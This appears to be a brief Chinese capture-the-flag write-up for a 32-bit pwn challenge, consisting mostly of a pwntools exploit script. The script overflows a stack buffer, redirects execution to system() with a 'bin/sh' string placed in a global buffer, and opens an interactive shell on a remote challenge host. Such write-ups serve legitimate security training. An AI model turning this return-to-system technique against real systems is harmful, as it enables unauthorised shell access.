第一次read把数据写到全局buf处 所以我们只要写bin/sh就可以有地址了
exp
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
| from pwn import *
from LibcSearcher import *
context(
terminal=["wt.exe","wsl"],
os = "linux",
arch = "i386",
log_level="debug",
)
elf = ELF("./pwn")
io = remote("node5.anna.nssctf.cn",28863)
def debug():
gdb.attach(io)
pause()
shellcode = asm(shellcraft.sh())
offet = 0x1C + 0x4
buf_addr = 0x804A080
sys_addr = elf.sym['system']
payload = cyclic(offet)+p32(sys_addr)+p32(0)+p32(buf_addr)
io.sendlineafter('name\n','bin/sh')
io.sendlineafter("time~\n",payload)
io.interactive()
|
